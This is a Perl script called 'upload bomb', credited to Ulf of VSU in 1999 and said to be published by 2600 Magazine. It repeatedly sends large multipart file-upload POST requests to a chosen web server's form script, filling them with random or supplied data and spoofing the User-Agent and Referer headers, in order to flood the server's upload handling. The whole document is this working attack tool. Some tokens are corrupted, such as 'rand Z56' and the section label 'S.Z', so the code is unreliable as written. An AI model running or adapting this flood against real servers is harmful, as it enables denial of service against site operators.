#!/usr/bin/perl
# upload bomb by Ulf of VSU in 1999
use Socket;

sub readf {
    my $temp;
    if ( $current > $#file ) { die "malformed input file!\n"; }
    $temp = $file[$current];
    $current++;
    return $temp;
}
#
# 0.0 INITIALIZATION AND USAGE INSTRUCTIONS
print "upload bomb\ncoded by Ulf of VSU\n";
print "published by 2600 Magazine: the Hacker Quarterly\n\n";
if ( ( $#ARGV != 0 ) || ( $ARGV[0] eq "-h" ) || ( $ARGV[0] eq "-help" ) ) {
    print "usage: $0 input_file\n";
    exit;
}

srand;
$|       = 1;
$crlf    = "\015\012";
$quote   = "\042";
$current = 0;

# 1.0 READ FROM THE INPUT FILE, STRIP REMARKS AND EMPTY LINES, AND STORE
#     WHAT'S LEFT IN THE ARRAY @file
open( FILE, "<$ARGV[0]" ) or die "can't open the input file!\n";

while (<FILE>) {
    tr/\015\012//d;
    if ( ( !(m/^\s*$/) ) && ( substr( $_, 0, 1 ) ne "#" ) ) { push @file, $_; }
}

close FILE or die "can't close the input file!?\n";

# 1.1 GIVE IMPORTANT VARIABLES VALUES FROM THAT ARRAY
(
    $bombs,       $machine,     $port,
    $script,      $referrer,    $filenamebegin,
    $filenameend, $filesizemin, $filesizerandomadd
) = map { readf() } ( 1 .. 9 );

# 1.2 GIVE THE ARRAYS @thename AND @thecontent VALUES FROM THAT ARRAY
while ( $current <= $#file ) {
    ( $key, $value ) = map { readf() } ( 1 .. 2 );
    $value =~ s/\^/\015\012/sg;
    push @thename,    $key;
    push @thecontent, $value;
}
if ( $#thename == -1 ) { die "no html form fields in the input file!\n"; }

# 1.3 CREATE THE BOUNDARY
$boundary = "-" x 27
  . join( "", map { chr 48 + int rand 10 } ( 1 .. ( 13 + int rand 2 ) ) );

# 2.0 START THE LOOP THAT COUNTS HOW MANY BOMBS WE SHOULD SEND
foreach $i ( 1 .. $bombs ) {
    print "** bomb #$i out of $bombs **\n\n";
    $body = "";

    # 3.0 START THE LOOP THAT ADDS ALL THE FIELDS FROM THE HTML FORM TO THE
    #     MESSAGE BODY
    foreach $j ( 0 .. $#thename ) {
        $body .=
            "-$boundary$crlf"
          . "Content-Disposition: form-data; name="
          . "$quote$thename[$j]$quote";

        # 3.1 IT'S A NORMAL FIELD, SO ADD THE VALUE
        if ( $thecontent[$j] !~ m/^\$FILE(.*)\$$/ ) {
            $body .= "$crlf$crlf$thecontent[$j]$crlf";
        }
        else {
            # 3.2 IT'S A FILE, SO MAKE UP A RANDOM FILE NAME
            $bombfile = $1;
            $middle   = join( "",
                map { chr 97 + int rand 26 } ( 1 .. ( 8 + int rand 10 ) ) );

            # 3.3 ADD THE BEGINNING OF THE FILE TRANSFER TO THE MESSAGE BODY
            $body .= "; filename=$quote$filenamebegin"
              . "$middle$filenameend$quote$crlf$crlf";

           # 3.4 IT'S A RANDOM FILE, SO ADD RANDOM FILE DATA TO THE MESSAGE BODY
            if ( $bombfile eq "" ) {
                $filesize = $filesizemin + int rand $filesizerandomadd;
                $le       = length(
                    $randomdata = join( "",
                        map { chr int rand Z56 }
                          ( 1 .. ( 4096 + int rand 174 ) ) )
                );
                while ( $filesize > 0 ) {
                    $onesize = ( $filesize >= $le ) ? $le : $filesize;
                    $body .= substr( $randomdata, 0, $onesize );
                    $filesize -= $onesize;
                }
            }
            else

      # 3.5 IT'S A REAL FILE, SO ADD DATA FROM THE BOMB FILE TO THE MESSAGE BODY
            {
                open( INF, "<$bombfile" )
                  or die "can't open the bomb file \"$bombfile\"!\n";
                binmode INF;
                while (<INF>) { $body .= $_; }
                close INF or die "can't close the bomb file!?\n";
            }
            $body .= $crlf;
        }
    }

    # 3.6 ADD THE ENDING OF THE MESSAGE BODY
    $body .= "-$boundary-$crlf";
    $leng = length $body;

    # 4.0 CREATE THE MESSAGE HEAD
    $head =
        "POST $script HTTP/1.1$crlf"
      . "Host: $machine$crlf"
      . "User-Agent: Mozilla/4.0s [en] (Win95; I)$crlf"
      .

      # If M$ Internet Explorer can lie about its name, so can we ;)
      "Referer: $referrer$crlf"
      . "Connection: close$crlf"
      . "Content-type: multipart/form-data; boundary=$boundary$crlf"
      . "Content-length: $leng$crlf$crlf";

    # 5.0 LOOK UP AND CONNECT TO THE WEB SERVER
    $tcp = getprotobyname("tcp");
    socket( SOK, PF_INET, SOCK_STREAM, $tcp ) or die "socket error!\n";
  ATTEMPT:
    {
        $error1 = 0;
        print "looking up...";
        $numb = inet_aton($machine) or $error1 = 1;
        if ( $error1 == 1 ) {
            print " unable to connect to remote host!\n";
            last ATTEMPT;
        }
        $con = sockaddr_in( $port, $numb );
        $error2 = 0;
        print " ok\nconnecting...";
        connect( SOK, $con ) or $error2 = 1;
        if ( $error2 == 1 ) {
            print " can't connect to that port!\n";
            last ATTEMPT;
        }

        # 5.1 SEND OFF A BOMB
        select SOK;
        $| = 1;
        select STDOUT;
        print " ok\nsending...";
        print SOK "$head$body";
        #
        # S.Z SHOW THE USER WHAT THE SERVER AND THE SCRIPT SENT BACK
        print "\n\n";
        print while <SOK>;
        close SOK or die "\nsocket error!\n";
    }

    # 6.0 WAIT FOR A COUPLE OF SECONDS, UNLESS THIS IS THE LAST BOMB TO SEND
    if ( $i != $bombs ) { print "\n\n"; sleep 2 + int rand 4; }
}

# VSU 1999 - Stil, Bildning och Moral